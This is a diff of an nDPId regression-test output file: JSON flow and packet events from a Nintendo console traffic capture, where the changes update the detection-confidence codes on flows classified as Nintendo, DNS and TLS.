00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731320764,"flow_last_seen":1500731320764,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1500731320764,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"134.3.248.25","src_port":52119,"dst_port":56955,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1500731320764,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1500731320764,"pkt":"AA6OGXEMfLuKifuECABFAABYEUIAAEARHhzAqAxyhgP4GcuX3nsARKmOMquYZAL7A4GWfECoPkHlkau7Ijb2F2MvtOU+dosmvR+Tfti6\/9NW0mVVtday4XIk1NfCl4ZHAO\/1Fxpd"} -00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731320764,"flow_last_seen":1500731320764,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1500731320764,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"134.3.248.25","src_port":52119,"dst_port":56955,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731320764,"flow_last_seen":1500731320764,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1500731320764,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"134.3.248.25","src_port":52119,"dst_port":56955,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731320774,"flow_last_seen":1500731320774,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1500731320774,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"109.21.255.11","src_port":52119,"dst_port":50251,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1500731320774,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1500731320774,"pkt":"AA6OGXEMfLuKifuECABFAABYEUMAAEARMBfAqAxybRX\/C8uXxEsARC8cMquYZAJGA3KWhoRABV3FWfmtjLEwkvqReL4g94smvR+Tfti6\/9NW0mVVtdahZ4Yi8EkEbE+Cf5dTG6Dk"} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731320774,"flow_last_seen":1500731320774,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1500731320774,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"109.21.255.11","src_port":52119,"dst_port":50251,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731320774,"flow_last_seen":1500731320774,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1500731320774,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"109.21.255.11","src_port":52119,"dst_port":50251,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1500731320842,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1500731320842,"pkt":"fLuKifuEAA6OGXEMCABFAABYEicAADMRKjeGA\/gZwKgMct57y5cARE+8MquYZAIZA8hA\/JaGDMK+3tfYvFe22fqmgHrRaYsmvR+Tfti6\/9NW0mVVtdaFuHgj\/oXYMvE1kVZddtPK"} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1500731320881,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1500731320881,"pkt":"fLuKifuEAA6OGXEMCABFAABYK0gAADIRJBJtFf8LwKgMcsRLy5cARH7BMquYZAKvA36Er5aJDtEHqQojRhZUoJvCATzcAYsmvR+Tfti6\/9NW0mVVtdYSzDno2v3JjwLx3wkvum1y"} 00646{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1500731320971,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1500731320971,"pkt":"fLuKifuEAA6OGXEMCABFAAC497sAADIRdTNbCPMjwKgMcsEYy5cApCSHMquYZAJwBDw1LZb\/EXOjSMMnhE7iZD46YMnDknY2Toj8H3hexFk8t\/NxtrnGBe7\/azeV+ylrxOZLEJSeqtaVZpj8qkFUmEqDrAokbYC5tpC2hu85m1Gapy+z4MYRc6NIwyeETuJkPjpgycOS4O1pGafPZccfGHcxxjvnUp7EdqfBF4phVhM5G67auDF2qW+tEyxBQPI1F2LvuWv4"} @@ -17,28 +17,28 @@ 00649{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1500731320980,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1500731320980,"pkt":"AA6OGXEMfLuKifuECABFAAC4EUYAAEARL7TAqAxybRX\/C8uXxEsApGfqMquYZAJGA3OXVoUOaa8xKMh3YxOqQfCOROhuZZ1cluqPszGtOrY8\/h+Ka05RJidBwdgpJSzxyPBzPUj\/QCqQX5N8LEBCJOczUrsTufJdxx5Y+oG3liR0QxxR9FdprzEoyHdjE6pB8I5E6G5l7EcDtxNE8JSi4yBs1WWoHG7r\/Cy+MHjWKN4dY\/SnlSlX+kXE8MPCEZprJe3ihEAS"} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731322454,"flow_last_seen":1500731322454,"flow_idle_time":7580000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":1,"thread_ts_msec":1500731322454,"l3_proto":"ip4","src_ip":"54.187.10.185","dst_ip":"192.168.12.114","src_port":443,"dst_port":48328,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00609{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1500731322454,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1500731322454,"pkt":"fLuKifuEAA6OGXEMCABFAACYFZdAAOUGcTo2uwq5wKgMcgG7vMgz\/J5Zi2972IAYALkcKwAAAQEICgQM20EAGkXPFwMDAF\/eldsI13HzPlUjJzvSUWyEIzWGgbOyhWxdkIHfN3lgjdjjc7JiXYu\/ooQ\/gzWIbwSHhgUl7CbzYWzRlB2Fe4u0GxVFMrAIoxb4XR3ehSS5gi8Kq9fYRepj92tegMbl5w=="} -00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731322454,"flow_last_seen":1500731322454,"flow_idle_time":7580000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":1,"thread_ts_msec":1500731322454,"l3_proto":"ip4","src_ip":"54.187.10.185","dst_ip":"192.168.12.114","src_port":443,"dst_port":48328,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731322454,"flow_last_seen":1500731322454,"flow_idle_time":7580000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":1,"thread_ts_msec":1500731322454,"l3_proto":"ip4","src_ip":"54.187.10.185","dst_ip":"192.168.12.114","src_port":443,"dst_port":48328,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1500731322460,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":117,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":117,"pkt_l4_len":83,"thread_ts_msec":1500731322460,"pkt":"AA6OGXEMfLuKifuECABFAABnEVxAAEAGGqfAqAxyNrsKubzIAbuLb3vYM\/yevYAYBAhG+gAAAQEICgAaYTYEDNtBFwMDAC4AAAAAAAAAKH6viddQUv6VCP9kwNVv1cM5qFQr1yPk5rVuTEPwOaETSFnM6WhQ"} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1500731322761,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1500731322761,"pkt":"fLuKifuEAA6OGXEMCABFAAA0FZhAAOUGcZ02uwq5wKgMcgG7vMgz\/J69i298C4AQALmNxAAAAQEICgQM25wAGmE2"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":60,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731323269,"flow_last_seen":1500731323269,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1500731323269,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"35.158.74.61","src_port":52119,"dst_port":33335,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1500731323269,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":1500731323269,"pkt":"AA6OGXEMfLuKifuECABFAABoEV8AAEARLjHAqAxyI55KPcuXgjcAVAoAMquYZAIAAACgRQAAPD+rAYcrvhgZcqXY4tF4R087lVXf\/uabOP7DTtPl\/Z68o2TwyTMiy\/1PT8Q0PYJjfL9\/FaWie4QujpeJZMzmHA=="} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731323269,"flow_last_seen":1500731323269,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1500731323269,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"35.158.74.61","src_port":52119,"dst_port":33335,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731323269,"flow_last_seen":1500731323269,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1500731323269,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"35.158.74.61","src_port":52119,"dst_port":33335,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1500731323270,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":1500731323270,"pkt":"AA6OGXEMfLuKifuECABFAABoEWAAAEARLjDAqAxyI55KPcuXgjcAVAoAMquYZAIAAACgRQAAPD+rAYcrvhgZcqXY4tF4R087lVXf\/uabOP7DTtPl\/Z68o2TwyTMiy\/1PT8Q0PYJjfL9\/FaWie4QujpeJZMzmHA=="} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1500731323270,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":1500731323270,"pkt":"AA6OGXEMfLuKifuECABFAABoEWEAAEARLi\/AqAxyI55KPcuXgjcAVCUqMquYZAIAAACgRgAAPD+rAYcrvhgZcqXY4tF4R087lVXf\/uabOP7DTtPl\/Z68o2TwyTMiy\/1PT8Q0PYJjeofEEG4mAZPKsmIYZ3XQPw=="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731326270,"flow_last_seen":1500731326270,"flow_idle_time":200000,"flow_min_l4_payload_len":688,"flow_max_l4_payload_len":688,"flow_tot_l4_payload_len":688,"flow_avg_l4_payload_len":688,"midstream":0,"thread_ts_msec":1500731326270,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"52.10.205.177","src_port":52119,"dst_port":34343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01394{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1500731326270,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":730,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":730,"pkt_l4_len":696,"thread_ts_msec":1500731326270,"pkt":"AA6OGXEMfLuKifuECABFAALMEW8AAEARl9zAqAxyNArNscuXhicCuLNGMquYZAEAAACsAAAACAICgAAAAAAAZU1IgACGJwAAAAAPAfz\/AmL\/\/\/\/\/\/\/\/\/\/\/\/\/DNhnHrgUDeqh96EJudpqr7HTWmwuyiNXAoN8EJ3L9Q9BYy53b12QoycQBbgF0+MGumCDqya3DRDi\/FgfUDp8jmtF0eLtdJawWMd0Uh7gRi0nJAedvr+L4LDG+1PkKHdQjXkwcc63uSwXLbhZGs5rZ8pLuCki3H7JLOG5CI96WiAzLSOgOT5MmMOkBR9lHnUbly8I57OvnsPjzu2ZoGj750rOuJoq4PDp+HTtcuUkR\/yuCERU5DE5fS3WD79Od2EljENI\/Aj0rbyEoWaVKXUGbMeIN\/PHtUKEKwxkiH\/DZpj\/dOZVZle2A+wpaUtVb5Kkq8m0M0sj8U0Nr8\/f9iy5nCcQHobd29hf9qcfXx\/tCnteI0cP0tyykizOxpnlPK2I0STXsPD0wxOnU\/OOfu8Wm3V94s2PEbCeAbRx8PvXHbjtAm8AnmQMBMeFM6TQwwpijOYTfaXxrgmiFU\/AHPdepp0ILcWD5QSKt4MWDsJ\/eC61SjGvCVRvXn2JW5KB\/4JQcfZHw4S\/auTmIFCllOyidDXFohQ4NU8A9vt0e5qrI\/cou3U09qQhgu6ncsvX+jQusCyJhx1EpdaFLaOseb4xo0IjeHtTg5uKzMiP+l3dg6BJfcICpsS0fKy4Lvcxzq4iHlV\/CkZw5k\/5qPEe1WClYIIYAQ1QuHKqZOMgl0qEP1biit38pQoNuI5A\/WZ4yptUyrSpaVacwxp5yZkU47ddcg7lId\/wkwQjzVN9BmlVIcEupSyiP64T8RypU57m5OsmKDUV8cUXr\/nGnwi\/96TbsG+A6i29VkTJzG6j04DbRd\/2rnSbi4lJUC2\/\/AUQQJGvBPVxZ\/JcWHrRv6UUWsmJyg=="} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":89,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731326599,"flow_last_seen":1500731326599,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1500731326599,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":18874,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1500731326599,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1500731326599,"pkt":"AA6OGXEMfLuKifuECABFAABgEXIAAEARz1fAqAxywKgMAUm6ADUATBSXAEkBAAABAAAAAAAAIGUwZDY3YzUwOWZiMjAzODU4ZWJjYjJmZTNmODhjMmFhBGJhYXMIbmludGVuZG8DY29tAAABAAE="} -00803{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731326599,"flow_last_seen":1500731326599,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1500731326599,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":18874,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00803{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731326599,"flow_last_seen":1500731326599,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1500731326599,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":18874,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00757{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1500731326628,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1500731326628,"pkt":"fLuKifuEAA6OGXEMCABFAAELMF9AAEARb7\/AqAwBwKgMcgA1SboA95AtAEmBgAABAAkAAAAAIGUwZDY3YzUwOWZiMjAzODU4ZWJjYjJmZTNmODhjMmFhBGJhYXMIbmludGVuZG8DY29tAAABAAHADAAFAAEAAAAeAB8OZDNmdGhwdnY3Znp4MDAKY2xvdWRmcm9udANuZXQAwFAAAQABAAAAPAAENsAb2cBQAAEAAQAAADwABDbAG8TAUAABAAEAAAA8AAQ2wBsnwFAAAQABAAAAPAAENsAbUcBQAAEAAQAAADwABDbAG0rAUAABAAEAAAA8AAQ2wBuuwFAAAQABAAAAPAAENsAbaMBQAAEAAQAAADwABDbAGwg="} -00820{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":90,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1500731326599,"flow_last_seen":1500731326628,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":153,"midstream":0,"thread_ts_msec":1500731326628,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":18874,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.192.27.217"}} +00820{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":90,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1500731326599,"flow_last_seen":1500731326628,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":153,"midstream":0,"thread_ts_msec":1500731326628,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":18874,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.192.27.217"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731326644,"flow_last_seen":1500731326644,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1500731326644,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.217","src_port":41517,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1500731326644,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1500731326644,"pkt":"AA6OGXEMfLuKifuECABFAAA8EXNAAEAGCZbAqAxyNsAb2aItAbvSLGpEAAAAAKACgABWsQAAAgQFUAEDAwYEAggKABpxjAAAAAA="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1500731326676,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1500731326676,"pkt":"fLuKifuEAA6OGXEMCABFAAA8AABAAPUGZgg2wBvZwKgMcgG7oi3AHA3T0ixqRaAScSCE4wAAAgQFrAQCCAqn0Wp9ABpxjAEDAwg="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1500731326680,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1500731326680,"pkt":"AA6OGXEMfLuKifuECABFAAA0EXRAAEAGCZ3AqAxyNsAb2aItAbvSLGpFwBwN1IAQAg4imAAAAQEICgAaca+n0Wp9"} -00994{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":94,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1500731326644,"flow_last_seen":1500731326686,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1500731326686,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.217","src_port":41517,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 